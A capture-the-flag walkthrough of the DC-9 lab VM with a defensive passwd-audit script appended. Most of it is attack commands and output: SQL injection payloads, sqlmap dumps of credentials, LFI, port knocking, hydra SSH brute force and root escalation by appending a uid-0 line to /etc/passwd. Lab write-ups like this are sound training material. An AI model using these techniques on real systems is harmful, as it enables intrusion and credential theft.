DC-9 VM download address
https://www.vulnhub.com/entry/dc-9,412/
VM description
Description
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.
Technical Information
DC-9 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.
DC-9 has been tested successfully on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.
It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.
Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.
Important
While there should be no problems using this VM, by downloading it, you accept full responsibility for any unintentional damage that this VM may cause.
In saying that, there shouldn't be any problems, but I feel the need to throw this out there just in case.
Credits
A big thanks goes out to the members of @m0tl3ycr3w.
Contact
I'm also very interested in hearing how people go about solving these challenges, so if you're up for writing a walkthrough, please do so and send me a link, or alternatively, follow me on Twitter, and DM me (you can unfollow after you've DM'd me if you'd prefer).
I can be contacted via Twitter - @DCAU7
Lab environment
- Attacking VPS (Kali Linux): ip_addr 172.25.0.69
- DC-9 VM: mac_addr 00:0c:29:b1:3a:71
0x01 Host discovery
Capturing ARP traffic shows that the DC-9 VM's IP address is 172.25.0.71
kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
Currently scanning: Finished! | Screen View: Unique Hosts
54 Captured ARP Req/Rep packets, from 4 hosts. Total size: 3240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
172.25.0.1 00:50:56:c0:00:08 19 1140 VMware, Inc.
172.25.0.2 00:50:56:f8:42:a0 17 1020 VMware, Inc.
172.25.0.71 00:0c:29:b1:3a:71 17 1020 VMware, Inc.
172.25.0.100 00:50:56:e5:b3:42 1 60 VMware, Inc.
0x02 Port scan
The target DC-9 exposes a web service and an SSH service.
kali@kali:~$ sudo nmap -A -p- 172.25.0.71
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 19:21 EST
Nmap scan report for 172.25.0.71
Host is up (0.00080s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:B1:3A:71 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.80 ms 172.25.0.71
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.54 seconds
0x03 Vulnerability discovery and exploitation
Start directly with the web application
The search.php page interacts with the database
Capture the request in Burp Suite to check for SQL injection
The verification process is below; the injection is confirmed!
Run sqlmap against it directly
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D users -T UserDetails --dump
[sqlmap banner] {1.4.2.30#dev} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:46:24 /2020-03-03/
[18:46:25] [INFO] resuming back-end DBMS 'mysql'
[18:46:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:46:25] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:46:25] [INFO] fetching columns for table 'UserDetails' in database 'users'
[18:46:25] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+
[18:46:25] [INFO] table 'users.UserDetails' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\users\UserDetails.csv'
[18:46:25] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:46:25 /2020-03-03/
C:\Users\Administrator\Desktop\burp\sqlmap-master>python sqlmap.py -u http://172.25.0.71/results.php --data "search=1" -D Staff -T Users --dump --thread 1000
[sqlmap banner] {1.4.2.30#dev} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 18:50:02 /2020-03-03/
[18:50:03] [INFO] resuming back-end DBMS 'mysql'
[18:50:03] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: search=1' AND (SELECT 3605 FROM (SELECT(SLEEP(5)))foDI) AND 'YuPB'='YuPB
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: search=1' UNION ALL SELECT CONCAT(0x7162767171,0x6f756a62416d4266637054726e4d7052654647774f556a4a5a5846717356785a5378545141687a43,0x716a707871),NULL,NULL,NULL,NULL,NULL-- -
---
[18:50:03] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[18:50:03] [INFO] fetching columns for table 'Users' in database 'Staff'
[18:50:03] [INFO] fetching entries for table 'Users' in database 'Staff'
[18:50:03] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[18:50:04] [INFO] writing hashes to a temporary file 'C:\Users\Administrator\AppData\Local\Temp\sqlmapo88z6e7110392\sqlmaphashes-cjlb6jp7.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[18:50:05] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file 'C:\Users\Administrator\Desktop\burp\sqlmap-master\data\txt\wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[18:50:06] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[18:50:08] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[18:50:08] [INFO] starting 4 processes
[18:50:40] [INFO] using suffix '1'
[18:51:12] [INFO] cracked password 'transorbital1' for user 'admin'
Database: Staff
Table: Users
[1 entry]
+--------+--------------------------------------------------+----------+
| UserID | Password | Username |
+--------+--------------------------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc (transorbital1) | admin |
+--------+--------------------------------------------------+----------+
[18:51:12] [INFO] table 'Staff.Users' dumped to CSV file 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71\dump\Staff\Users.csv'
[18:51:12] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\172.25.0.71'
[*] ending @ 18:51:12 /2020-03-03/
The SQL injection yields the back-end admin credentials
admin:transorbital1
Log in to the admin back end with the admin account
The search.php and addrecord.php pages have a local file inclusion vulnerability (the page included at the bottom reports that the file does not exist, which suggests LFI)
Confirmed as follows
Build a username list and a password list from the users and passwords collected above for the SSH brute force that follows
Attempt the SSH brute force
The brute force does not work, which raises the question of whether a daemon is guarding the port
Using the file inclusion vulnerability again, we find that such a daemon (knockd) is present
What knockd does
Simply put, it hides the SSH login port (which is why port 22 appeared blocked when we scanned earlier). The firewall opens the login port only after the ports are knocked in the configured order; knocking in the same way again makes the firewall close the SSH port, so anyone who does not know the configured knock sequence cannot log in over SSH. We can download knock to open the remote port
Reading the configuration file shows that knocking ports 7469, 8475 and 9842 in order opens port 22 for the SSH service
The commands are as follows
nc 172.25.0.71 7469
nc 172.25.0.71 8475
nc 172.25.0.71 9842
Next, use hydra for the password brute force
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:17:50
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 153 login tries (l:9/p:17), ~10 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:18:18
The brute force yields the following SSH credentials for DC-9
chandlerb:UrAG0D!
janitor:Ilovepeepee
Log in to DC-9 over SSH and gather information
Useful password information is found in janitor's home directory
janitor@dc-9:~$ ls -alh
total 16K
drwx------ 4 janitor janitor 4.0K Mar 3 21:18 .
drwxr-xr-x 19 root root 4.0K Dec 29 20:02 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 21:48 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4.0K Mar 3 21:18 .gnupg
drwx------ 2 janitor janitor 4.0K Dec 29 17:10 .secrets-for-putin
janitor@dc-9:~$ cd .secrets-for-putin/
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
janitor@dc-9:~/.secrets-for-putin$
Add the collected passwords to the password list and brute force again
kali@kali:~$ hydra -L user.dic -P password.dic 172.25.0.71 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-03-03 06:25:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 230 login tries (l:10/p:23), ~15 tries per task
[DATA] attacking ssh://172.25.0.71:22/
[22][ssh] host: 172.25.0.71 login: fredf password: B4-Tru3-001
[22][ssh] host: 172.25.0.71 login: chandlerb password: UrAG0D!
[22][ssh] host: 172.25.0.71 login: janitor password: Ilovepeepee
[22][ssh] host: 172.25.0.71 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 4 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-03-03 06:26:14
Two more users' passwords are cracked
login: fredf password: B4-Tru3-001
login: chandlerb password: UrAG0D!
login: janitor password: Ilovepeepee
login: joeyt password: Passw0rd
0x04 Privilege escalation via sudo
Log in to DC-9 over SSH as fredf
Check what fredf can run as root: a compiled Python script
Run it: it prints a usage message asking for python test.py plus arguments!
kali@kali:~$ ssh fredf@172.25.0.71
fredf@172.25.0.71's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Mar 3 21:27:19 2020 from 172.25.0.69
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test
Usage: python test.py read append
Locate the Python source with find and read it
Briefly, the script opens one file and appends its contents to another file.
fredf@dc-9:/opt/devstuff/dist/test$ find / -name "test.py" 2>/dev/null
/opt/devstuff/test.py
/usr/lib/python3/dist-packages/setuptools/command/test.py
fredf@dc-9:/opt/devstuff/dist/test$ cat /opt/devstuff/test.py
#!/usr/bin/python
import sys
if len (sys.argv) != 3 :
    print ("Usage: python test.py read append")
    sys.exit (1)
else :
    f = open(sys.argv[1], "r")
    output = (f.read())
    f = open(sys.argv[2], "a")
    f.write(output)
    f.close()
This gives us an approach: craft a user entry with uid=0, append it to /etc/passwd, and thereby escalate to root.
The escalation process is as follows:
Adding a uid 0 account with no password did not work
So use openssl to generate a hash for the password 123456
openssl passwd -1 -salt whjy 123456
fredf@dc-9:/opt/devstuff$ echo zgjy::0:0:::/bin/bash >>/tmp/zgjy
fredf@dc-9:/opt/devstuff$ cd -
/opt/devstuff/dist/test
fredf@dc-9:/opt/devstuff/dist/test$ ./test /tmp/zgjy /etc/passwd
Traceback (most recent call last):
File "test.py", line 13, in <module>
PermissionError: [Errno 13] Permission denied: '/etc/passwd'
[3516] Failed to execute script test
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/zgjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$ sudo cat /etc/passwd
[sudo] password for fredf:
Sorry, user fredf is not allowed to execute '/usr/bin/cat /etc/passwd' as root on dc-9.
fredf@dc-9:/opt/devstuff/dist/test$ su - zgjy
su: user zgjy does not exist
fredf@dc-9:/opt/devstuff/dist/test$
fredf@dc-9:/opt/devstuff/dist/test$ echo 'whjy:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash' >> /tmp/whjy
fredf@dc-9:/opt/devstuff/dist/test$ sudo ./test /tmp/whjy /etc/passwd
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: Authentication failure
fredf@dc-9:/opt/devstuff/dist/test$ su - whjy
Password:
su: warning: cannot change directory to /bin/bash: Not a directory
# id
uid=0(root) gid=0(root) groups=0(root)
# /bin/bash
bash: /bin/bash/.bashrc: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd ~
bash: cd: /bin/bash: Not a directory
root@dc-9:/opt/devstuff/dist/test# cd /root
root@dc-9:/root# ls
theflag.txt
root@dc-9:/root# cat thrflag.txt
cat: thrflag.txt: No such file or directory
root@dc-9:/root# cat theflag.txt
███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.
I also want to send out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, but...just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.
So long, and thanks for all the fish.
sudo privilege escalation succeeded and the flag is captured; the DC series ends here!
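A defender's check for the tampering just shown, added here as an example and not part of the original walkthrough: it audits /etc/passwd-format text for the artefacts this escalation leaves behind (a second uid 0 account, an empty password field, a crypt hash placed in passwd to bypass shadow, and the six-field whjy line whose missing shell explains the bare # prompt after su). The passwd sample is constructed to mirror the entries appended above.

```python
import re

# Constructed sample /etc/passwd (not copied from any host): three ordinary Debian-style
# entries followed by the two lines the walkthrough appended via the sudo-able test
# script. zgjy has an empty password field; whjy carries an MD5-crypt hash in the
# password field and has only six fields, so its login shell is missing.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fredf:x:1003:1003:Fred Flintstone,,,:/home/fredf:/bin/bash
zgjy::0:0:::/bin/bash
whjy:$1$au$yiTIEVOOBr5S6eBjHZluV/:0:0:root:/bin/bash
"""

# Password-field values that legitimately appear in /etc/passwd on a shadowed system.
SHADOW_PLACEHOLDERS = {"x", "*", "!", "!!"}
# crypt(3) prefixes: $1$ MD5, $2a/$2b/$2y$ bcrypt, $5$ SHA-256, $6$ SHA-512, $y$/$gy$ yescrypt.
HASH_RE = re.compile(r"^\$(1|2[aby]|5|6|y|gy)\$")


def audit_passwd(text: str) -> list[tuple[str, str]]:
    """Return (username, finding) pairs for entries a defender should question."""
    findings: list[tuple[str, str]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        name = fields[0]
        if len(fields) != 7:
            findings.append((name, f"line {lineno}: malformed entry with {len(fields)} fields"))
            # glibc still accepts such a line; a missing trailing shell field reads as ""
            fields = (fields + [""] * 7)[:7]
        _, pw, uid, _gid, _gecos, home, shell = fields
        if uid == "0" and name != "root":
            findings.append((name, "uid 0 account that is not root"))
        if pw == "":
            findings.append((name, "empty password field: login without a password"))
        elif pw not in SHADOW_PLACEHOLDERS and HASH_RE.match(pw):
            findings.append((name, "password hash stored in passwd instead of shadow"))
        if home == "":
            findings.append((name, "empty home directory"))
        if shell == "":
            findings.append((name, "missing login shell (su falls back to /bin/sh)"))
    return findings


def uid0_accounts(text: str) -> list[str]:
    """Every uid 0 account name; on a healthy host this is exactly ['root']."""
    rows = [line.split(":") for line in text.splitlines() if line.strip()]
    return [row[0] for row in rows if len(row) >= 3 and row[2] == "0"]


if __name__ == "__main__":
    for name, finding in audit_passwd(SAMPLE_PASSWD):
        print(f"{name}: {finding}")
```

Run against a real file with audit_passwd(open("/etc/passwd").read()); any output at all on a single-admin host deserves a look, and uid0_accounts returning more than ['root'] is an incident, not a finding.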